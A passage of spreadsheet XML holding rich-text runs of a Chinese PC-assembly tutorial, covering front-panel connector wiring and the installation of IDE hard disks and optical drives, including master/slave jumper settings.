      <t>结构的机箱上有一个总电源的开关接线，是个两芯的插头，它和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Reset</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的接头一样，按下时短路，松开时开路，按一下，电脑的总电源就被接通了，再按一下就关闭，但是你还可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>里设置为开机时必须按电源开关四秒钟以上才会关机，或者根本就不能按开关来关机而只能</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>**</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件关机。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>④这个三芯插头是电源指示灯的接线，使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线通常为绿色。在主板上，插针通常标记为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Power</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，连接时注意绿色线对应于第一针（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。当它连接好后，电脑一打开，电源灯就一直亮着，指示电源已经打开了。</t>
    </r>
  </si>
  <si>
    <r>
      <t>⑤硬盘指示灯的两芯接头，一线为红色。在主板上，这样的插针通常标着</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE LED</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HD LED</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的字样，连接时要红线对一。这条线接好后，当电脑在读写硬盘时，机箱上的硬盘的灯会亮。有一点要说明，这个指示灯只能指示</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬盘，对</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SCSI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬盘是不行的。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接下来我们还需将机箱上的电源，硬盘，喇叭，复位等控制连接端子线插入主板上的相应插针上。连接这些指示灯线和开关线是比较繁琐的，因为不同的主板在插针的定义上是不同的，究竟哪几根是用来插接指示灯的，哪几根是用来插接开关的都需要查阅主板说明白书才能清楚，所以我们建议你最好在将主板放入机箱前就将这些线连接好。另外主板的电源开关、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（复位开关）这几种设备是不分方向的，只要弄清插针就可以插好。而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HDD LED</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（硬盘灯）、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POWER LED</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（电源指示灯）等，由于使用的是发光二极管，所以插反是不能闪亮的，一定要仔细核对说明书上对该插针正负极的定义。（连好后的前面板线）</t>
    </r>
  </si>
  <si>
    <t>六、安装外部存储设备　　</t>
  </si>
  <si>
    <r>
      <t>外部存储设备包含硬盘、光驱（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DVD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CDRW</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）等等。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装硬盘（下图）　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）安装外部存储设备时的基础知识</t>
    </r>
  </si>
  <si>
    <r>
      <t>①每个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口都可以有（而且最多只能有）一个“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”（主盘，用于引导系统）盘。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>②当两个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上都连接有设置为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”时，老主板通常总是尝试从第一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上的“主”盘启动。而现在的主板，一般都可以通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CMOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的设置，指定哪一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上的硬盘是启动盘。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>③</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源在关机状态时仍保持</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5V</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电流，所以在进行零配件安装、拆卸及外部电缆线插、拔时必须关闭电源接线板开关或拔下机箱电源线。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>④有些机箱的驱动器托架安排得过于紧凑，而且与机箱电源的位置非常</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>**</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>近，安装多个驱动器时比较费劲。所以我们建议先在机箱中安装好所有驱动器，然后再进行线路连接工作，以免先安装的驱动器连线挡住安装下一个驱动器所需的空间。　</t>
    </r>
  </si>
  <si>
    <t>⑤为了避免因驱动器的震动造成的存取失败或驱动器损坏，建议在安装驱动器时在托架上安装并固定所有的螺丝。</t>
  </si>
  <si>
    <r>
      <t>⑥为了方便安装及避免机箱内的连接线过于杂乱无章，在机箱上安装硬盘、光驱时，连接与同一</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口的设备应该相邻。</t>
    </r>
  </si>
  <si>
    <t>⑦电源线的安装是有方向的，反了插不上。　</t>
  </si>
  <si>
    <r>
      <t>⑧考虑到以后可能需要安装多个硬盘或光驱，攒机前最好准备两条</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备信号线（俗称“排线”），每条线带</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个接口（一个连接主板</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口，另外两个用来连接硬盘或光驱）。为了避免机箱内的连接线过于杂乱无章，“排线”上用于连接硬盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光驱的接口应尽量与主板接口之间的“排线”长度应为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t>⑨在同一个排线</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上连接两个设备时，一般的原则是传输速度相近的安装在一起，硬盘和光驱应尽量避免安装在同一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>小知识：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主盘（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MASTER</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）与从盘（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SLAVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）——在一台计算机里一般只有两个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口，每一根接线有三个接口，其中一个接主板的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口，另两个则可以接两个硬盘或一个硬盘与一个光驱。在同一根接线上如果接两个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口设备，则其中一个是主盘，另一个为从盘。由于硬盘缺省的跳线设置为主硬盘，所以要将其中一个的跳线设为从盘，否则将无法启动系统。具体的设置可见硬盘后面的跳线设置说明。一般来说，光驱出厂时已设为从盘，所以安装时不必再跳。（硬盘上的跳线及说明文字）</t>
    </r>
  </si>
  <si>
    <r>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）单硬盘的安装　（下图）　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，如果你只用一根</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线来连接硬盘，那么我们就可以把硬盘放到插槽中去了，单手捏住硬盘（注意手指不要接触硬盘底部的电路板，以防身上的静电损坏硬盘），对准安装插槽后，轻轻地将硬盘往里推，直到硬盘的四个螺丝可以装紧为止。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第二步，一般主板上都有两个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插口——</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，在一般情况下我们都将硬盘连接在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上，而将光驱等设备连接在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上。此外，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上一般都有一个缺口以用来和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬盘线上的防插反凸块对应以防止插反。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第三步，先将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线在硬盘上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口上插好，然后再将其插紧在主板</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口中，最后再将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源上的扁平电源线接头在硬盘的电源插头上插好即可。需要注意的是，如果你的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线无防插反凸块，你在安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线时需本着以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线上有“红线一端对电源接口”的原则来进行安装。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、光驱安装　（下图）　</t>
    </r>
  </si>
  <si>
    <t>①光驱的跳线：光驱的跳线非常重要，特别是当光驱与硬盘共用一条数据线的时候，如果设置不正确就会无法识别光驱。一般安装一个光驱的时候只需要将它设置为主盘就行了。　　</t>
  </si>
  <si>
    <r>
      <t>②将光驱装入机箱：先拆掉机箱前方的一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>寸固定架面板，然后把光驱滑入。把光驱从机箱前方滑入机箱时要注意光驱的方向，现在的机箱大多数只需要将光驱平推入机箱就行了。但是有些机箱内有轨道，那么在安装光驱的时候就需要安装滑轨。安装滑轨时应注意开孔的位置，并且螺钉要拧紧，滑轨上有前后两组共</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个孔位，大多数情况下，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>**</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>近弹簧片的一对与光驱的前两个孔对齐，当滑轨的弹簧片卡到机箱里，听到“咔”的一声响，光驱就安装完毕。</t>
    </r>
  </si>
  <si>
    <r>
      <t>③固定光驱：在固定光驱时，要用细纹螺钉固定，每个螺钉不要一次拧紧，要留一定的活动空间。如果在上第一颗螺钉的时候就固定死，那么当你上其它</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颗螺钉的时候，有可能因为光驱有微小位移而导致光驱上的固定孔和框架上的开孔之间错位，导致螺钉拧不进去，而且容易滑丝。正确的方法是把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颗螺钉都旋入固定位置后，调整一下，最后再拧紧螺钉。</t>
    </r>
  </si>
  <si>
    <r>
      <t>④安装连接线：依次安装好</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
